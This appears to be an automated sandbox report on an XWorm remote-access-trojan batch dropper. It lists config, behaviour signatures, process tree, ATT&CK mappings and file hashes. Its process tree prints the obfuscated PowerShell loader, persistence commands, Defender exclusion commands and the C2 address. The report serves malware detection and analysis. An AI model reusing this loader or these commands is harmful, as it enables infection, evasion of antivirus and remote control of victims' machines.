Analysis

  • max time kernel
    150s
  • max time network
    159s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    25-05-2024 14:03

General

  • Target

    coin.b.bat

  • Size

    91KB

  • MD5

    520c1190bbbe3a7359a6e72f76618245

  • SHA1

    50d5e441a97aad127e8d5ad8c28c848b3be02c5d

  • SHA256

    91813779ab003d08ee337226c9ba845aaca64098e9740e6aaf30a0c8fa833ee0

  • SHA512

    98ebc8ee9b1b1d7302a5771f1e6b174903a9c249459a98e57e8cd48ce8760997b414246c7c9f05d1ce08fa299dcc2496c389b4126af647e8f2a6e9f81d15f749

  • SSDEEP

    1536:HtkPhsAgh2YhIXwWIN0hdI7E5WQTpJlqb3mE81vT1dkYHcga3kplWaEDN4nVoLuR:NeCAgX+vIuEE5PlJAb3mE81L1dkhX3mV

Malware Config

Extracted

Family

xworm

C2

continue-silk.gl.at.ply.gg:58347

127.0.0.1:58347

Attributes
  • Install_directory

    %Temp%

  • install_file

    steamwebhelper.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Runs PowerShell with the display window hidden.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely as a geofence check.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 47 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 43 IoCs
  • Suspicious use of SendNotifyMessage 40 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\coin.b.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:212
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c8KZIt7om0GReP7FMEfz0SGLs2AMU+4GQioHMorebJA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aiKe9c65ZjFACO2EycWX2w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $MEUKW=New-Object System.IO.MemoryStream(,$param_var); $piWSe=New-Object System.IO.MemoryStream; $AfYrg=New-Object System.IO.Compression.GZipStream($MEUKW, [IO.Compression.CompressionMode]::Decompress); $AfYrg.CopyTo($piWSe); $AfYrg.Dispose(); $MEUKW.Dispose(); $piWSe.Dispose(); $piWSe.ToArray();}function execute_function($param_var,$param2_var){ $eWsMy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mbrUF=$eWsMy.EntryPoint; $mbrUF.Invoke($null, $param2_var);}$OUKqL = 'C:\Users\Admin\AppData\Local\Temp\coin.b.bat';$host.UI.RawUI.WindowTitle = $OUKqL;$FwHhv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($OUKqL).Split([Environment]::NewLine);foreach ($oOibP in $FwHhv) { if ($oOibP.StartsWith(':: ')) { $aqXWs=$oOibP.Substring(3); break; }}$payloads_var=[string[]]$aqXWs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2240
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_164_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_164.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4808
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_164.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4436
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_164.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1356
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c8KZIt7om0GReP7FMEfz0SGLs2AMU+4GQioHMorebJA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aiKe9c65ZjFACO2EycWX2w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $MEUKW=New-Object System.IO.MemoryStream(,$param_var); $piWSe=New-Object System.IO.MemoryStream; $AfYrg=New-Object System.IO.Compression.GZipStream($MEUKW, [IO.Compression.CompressionMode]::Decompress); $AfYrg.CopyTo($piWSe); $AfYrg.Dispose(); $MEUKW.Dispose(); $piWSe.Dispose(); $piWSe.ToArray();}function execute_function($param_var,$param2_var){ $eWsMy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mbrUF=$eWsMy.EntryPoint; $mbrUF.Invoke($null, $param2_var);}$OUKqL = 'C:\Users\Admin\AppData\Roaming\startup_str_164.bat';$host.UI.RawUI.WindowTitle = $OUKqL;$FwHhv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($OUKqL).Split([Environment]::NewLine);foreach ($oOibP in $FwHhv) { if ($oOibP.StartsWith(':: ')) { $aqXWs=$oOibP.Substring(3); break; }}$payloads_var=[string[]]$aqXWs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Adds Run key to start application
            • Sets desktop wallpaper using registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1156
            • C:\Users\Admin\AppData\Local\Temp\seroxen.lib.exe
              "C:\Users\Admin\AppData\Local\Temp\seroxen.lib.exe"
              6⤵
              • Executes dropped EXE
              PID:5064
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3696
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4328
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\steamwebhelper.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4480
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'steamwebhelper.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1728
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "steamwebhelper" /tr "C:\Users\Admin\AppData\Local\Temp\steamwebhelper.exe"
              6⤵
              • Creates scheduled task(s)
              PID:1724
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html
              6⤵
              • Enumerates system info in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:1868
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed3d246f8,0x7ffed3d24708,0x7ffed3d24718
                7⤵
                PID:2252
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:2
                7⤵
                PID:772
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:4600
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:8
                7⤵
                PID:2580
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
                7⤵
                PID:1692
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
                7⤵
                PID:3036
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5016 /prefetch:8
                7⤵
                PID:3020
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5016 /prefetch:8
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:2060
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5084 /prefetch:1
                7⤵
                PID:4088
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1
                7⤵
                PID:4184
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
                7⤵
                PID:1804
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1
                7⤵
                PID:1692
            • C:\Windows\SYSTEM32\CMD.EXE
              "CMD.EXE"
              6⤵
              PID:5504
  • C:\Users\Admin\AppData\Local\Temp\steamwebhelper.exe
    C:\Users\Admin\AppData\Local\Temp\steamwebhelper.exe
    1⤵
    • Executes dropped EXE
    • Suspicious behavior: EnumeratesProcesses
    PID:4392
  • C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    1⤵
    PID:4844
  • C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    1⤵
    PID:2568

Network

MITRE ATT&CK Matrix ATT&CK v13

  • Execution
    T1059 Command and Scripting Interpreter (1)
    T1059.001 PowerShell (1)
    T1053 Scheduled Task/Job (1)
  • Persistence
    T1547 Boot or Logon Autostart Execution (1)
    T1547.001 Registry Run Keys / Startup Folder (1)
    T1053 Scheduled Task/Job (1)
  • Privilege Escalation
    T1547 Boot or Logon Autostart Execution (1)
    T1547.001 Registry Run Keys / Startup Folder (1)
    T1053 Scheduled Task/Job (1)
  • Defense Evasion
    T1112 Modify Registry (2)
  • Discovery
    T1012 Query Registry (3)
    T1082 System Information Discovery (3)
  • Impact
    T1491 Defacement (1)


Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    661739d384d9dfd807a089721202900b

    SHA1

    5b2c5d6a7122b4ce849dc98e79a7713038feac55

    SHA256

    70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

    SHA512

    81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
    Filesize

    152B

    MD5

    439b5e04ca18c7fb02cf406e6eb24167

    SHA1

    e0c5bb6216903934726e3570b7d63295b9d28987

    SHA256

    247d0658695a1eb44924a32363906e37e9864ba742fe35362a71f3a520ad2654

    SHA512

    d0241e397060eebd4535197de4f1ae925aa88ae413a3a9ded6e856b356c4324dfd45dddfef9a536f04e4a258e8fe5dc1586d92d1d56b649f75ded8eddeb1f3e2

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
    Filesize

    152B

    MD5

    a8e767fd33edd97d306efb6905f93252

    SHA1

    a6f80ace2b57599f64b0ae3c7381f34e9456f9d3

    SHA256

    c8077a9fc79e2691ef321d556c4ce9933ca0570f2bbaa32fa32999dfd5f908bb

    SHA512

    07b748582fe222795bce74919aa06e9a09025c14493edb6f3b1f112d9a97ac2225fe0904cac9adf2a62c98c42f7877076e409803014f0afd395f4cc8be207241

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
    Filesize

    5KB

    MD5

    849978e4c0325ec6e7d4c6a0a895f6df

    SHA1

    b1adb09a56dc68f61f5c944ee0b573eca47367a7

    SHA256

    4b060af277ba04ceb630615a9656ef81f32c10dce6c923e248088b42eea2c1b9

    SHA512

    369aed9fb47a3a3e6915183100a8557f61fc5bd21c0629bea37bba4b856eec99276b0cadeefb4735d1845d5240f49c69e75e0b204455c09fd603d5fa71865b27

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
    Filesize

    6KB

    MD5

    62ad9f96a2e85ba032774f000afcbcd5

    SHA1

    d19bdb0fce7d127579f64f164908fb93eaf7c200

    SHA256

    9fbba29cd86ec418c4cc98e4576300f4d679f534f33fd078de56b9ff5243eefc

    SHA512

    45404b716077f7b75b4b2e4f5b8852b5e96a94de1ce850aab703a1bbaae0a32c4567dee5db9b397754f18d26659caf76c1a7776ce9de460aac8a10b9ef22c94d

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
    Filesize

    6KB

    MD5

    5542cf28963c74a53ed2551e0f4c525c

    SHA1

    b710e5ecf0da306c1916c6a5a2923c2f84c76350

    SHA256

    e86aeb7880f2f9c6704ab458b94389f7621f97abaf5ae75501604b7100723e5e

    SHA512

    00c08963546f2aad6419c690fe48978a60d7bf314b8bdd250c5c664aaf36d82b286a698232fb599f4de7382a6ac9f1dafce119cae44b7bc86e165f05ec4f9620

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
    Filesize

    16B

    MD5

    6752a1d65b201c13b62ea44016eb221f

    SHA1

    58ecf154d01a62233ed7fb494ace3c3d4ffce08b

    SHA256

    0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

    SHA512

    9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
    Filesize

    11KB

    MD5

    50f0c807fcdf3619137ba4a584edf548

    SHA1

    87e8fbd7d5d2aeb9572ddcc01c4a38373b0e95f5

    SHA256

    96b4a11889ad0816b8e196cdfeb1e19a8df5846b9fb3286fab8df5cc938539ce

    SHA512

    29bf643d94c3504bfa59ed5398e6c870e7e0ded23e359090d5cf22c51a74bda7cffb91cb23d1ce9052505e8e80a5900b337c7faeb74d30c2a8bb0ae20584a95f

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
    Filesize

    11KB

    MD5

    e313496412fefbd487e8da7d93f5be78

    SHA1

    65ceb6947748440103f4345584a85765b095ac9e

    SHA256

    8421c3e986569aee19a0a9acb262b02a2d5d4da316529a8088f7285eadb4a4c8

    SHA512

    bcc7fac9b4e5a4402bd55ca4f6a2e53422c830d3134095c19158a802ac4cc79645286eeb2f54c9b94bceb07a2c1b5f15149c5d4a41808ad4358a7b29638bcd17

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    d0a40a2d16d62c60994d5bb5624a589b

    SHA1

    30f0a77f10518a09d83e6185d6c4cde23e4de8af

    SHA256

    c213a4024e89a0240d0b1fa3b18ea3db3db7bbe7ca1bdeed86dce9c2c4991ef8

    SHA512

    cecef5087f194a83948880e36445324406218f6877386d6db7850b8f97ac107e042ea9445bb7e73c6e6a2c7da9782b7dae8caba0a1c997677d096b3271a4cac0

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    d771de020a08527e71e3f36b2e8cd62a

    SHA1

    3023a9387de2502170d66773d4eb7f23fb155633

    SHA256

    65280b191b81b71435edfaea9625a1db4600b1c49140aae5def659cc73b20d80

    SHA512

    1d585a15797f5d6fe0a715431ae9733e3d382d75e5c372f9d212f0e2955ca6f0e27dc70093c51890982db1d3f2a19fa2f7089c2eade77b08403eb83966b920a3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    d28a889fd956d5cb3accfbaf1143eb6f

    SHA1

    157ba54b365341f8ff06707d996b3635da8446f7

    SHA256

    21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

    SHA512

    0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    c1b0a9f26c3e1786191e94e419f1fbf9

    SHA1

    7f3492f4ec2d93e164f43fe2606b53edcffd8926

    SHA256

    796649641966f606d7217bb94c5c0a6194eef518815dacc86feacdd78d3c1113

    SHA512

    fa0290d77372c26a2f14cb9b0002c222bc757ce7ad02516b884c59a1108f42eb4c76884f9edb6c7149f7c3fac917eda99b72a3b1d72b7e118a1d5a73cadd15a8

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pfi1atfd.yca.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\seroxen.lib.exe
    Filesize

    10KB

    MD5

    57a21007e4a8f423332f8e19b24081cd

    SHA1

    affc966362ddba697047e31e46b57c5da07a8135

    SHA256

    30db07f044a1f35c28ddbd111b1bf457db53555e464b2d60704c9e8023801c95

    SHA512

    e66dd63bb78e36f2c6d4dab62d0dd653d74eda19bcd834f358386dcef1cd60413fc4943be5766b547986ab4f28ea9b18e9e829008cdd00aa51afd5b4d6ac533b

  • C:\Users\Admin\AppData\Local\Temp\steamwebhelper.exe
    Filesize

    442KB

    MD5

    04029e121a0cfa5991749937dd22a1d9

    SHA1

    f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

    SHA256

    9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

    SHA512

    6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

  • C:\Users\Admin\AppData\Roaming\startup_str_164.bat
    Filesize

    91KB

    MD5

    520c1190bbbe3a7359a6e72f76618245

    SHA1

    50d5e441a97aad127e8d5ad8c28c848b3be02c5d

    SHA256

    91813779ab003d08ee337226c9ba845aaca64098e9740e6aaf30a0c8fa833ee0

    SHA512

    98ebc8ee9b1b1d7302a5771f1e6b174903a9c249459a98e57e8cd48ce8760997b414246c7c9f05d1ce08fa299dcc2496c389b4126af647e8f2a6e9f81d15f749

  • C:\Users\Admin\AppData\Roaming\startup_str_164.vbs
    Filesize

    115B

    MD5

    d205a237870aa23dc12fc98f1f45d49a

    SHA1

    292da3b980b6505376cba759b2253c8f1cefc7c6

                              SHA256

                              1d9e9b82693d1be7c72ccaace065b82ed70debd5ca63624bec87f61480822334

                              SHA512

                              7e613b45174f6d5ff7f7332b39d3a95c1874aecd8bfe603625c5852c8ac4d992330f2f38cfc03e01250226c647f841ba66529e57aa9d52a2882f4311c8ff8b80

                            • C:\Users\Admin\Desktop\How To Decrypt My Files.html
                              Filesize

                              632B

                              MD5

                              5b8c1f3e4a0e50e44dca4d16c3a09b8c

                              SHA1

                              ddd88605d5f3ad24ca878fb27b011fabebff741b

                              SHA256

                              db3ff1d4c3855db878d1217051ec64d096c38d4b067587345e5b06f6c0c9f5f7

                              SHA512

                              9eb4b1bf8481e8f4b1c31b5f161de563806d29ca05285a35b5d2cb7cf555d516bf23b060ecaa9ecd1dc7653f2ab5164ed1e6e8e8fef5d29d7189a2233736f1bf

                            • C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms.ENC
                              Filesize

                              16B

                              MD5

                              06469a74c28d1b5f39999a3a54eb356a

                              SHA1

                              b2d5f211b3a4eb53f06e432b5aad81caf90930b3

                              SHA256

                              393b36795513f3ab9625b4dcd988cb2b77a0d8e72378c9c632c632c8eaacd9d8

                              SHA512

                              071c2d5461ceb9f80d4cf375410ad156a21fcdb8433a445ba020ee2102887c99d1823645d7aef270c4f619f1588a405f6c12bd822e854817a686b5f3c44e33ee

                            • \??\pipe\LOCAL\crashpad_1868_OEQYIURTMLMWBTNJ
                              MD5

                              d41d8cd98f00b204e9800998ecf8427e

                              SHA1

                              da39a3ee5e6b4b0d3255bfef95601890afd80709

                              SHA256

                              e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                              SHA512

                              cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                            • memory/1156-129-0x0000015969E60000-0x0000015969E6C000-memory.dmp
                              Filesize

                              48KB

                            • memory/1156-51-0x00000159699F0000-0x0000015969A06000-memory.dmp
                              Filesize

                              88KB

                            • memory/1156-369-0x00000159699D0000-0x00000159699DA000-memory.dmp
                              Filesize

                              40KB

                            • memory/1156-387-0x0000015969C00000-0x0000015969C0A000-memory.dmp
                              Filesize

                              40KB

                            • memory/1156-131-0x000001594F550000-0x000001594F55C000-memory.dmp
                              Filesize

                              48KB

